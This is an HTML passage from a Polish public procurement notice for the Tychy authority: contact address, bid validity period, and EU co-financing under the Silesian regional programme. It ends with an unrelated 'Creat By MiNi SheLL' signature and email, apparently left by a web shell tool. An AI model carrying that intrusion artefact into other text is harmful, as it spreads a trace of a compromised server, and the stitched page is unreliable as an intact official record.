Dział Techniczno-Eksploatacyjny (pokój nr 20) 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013, Poddziałanie 6.2.3  Rewitalizacja - JESSICA..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com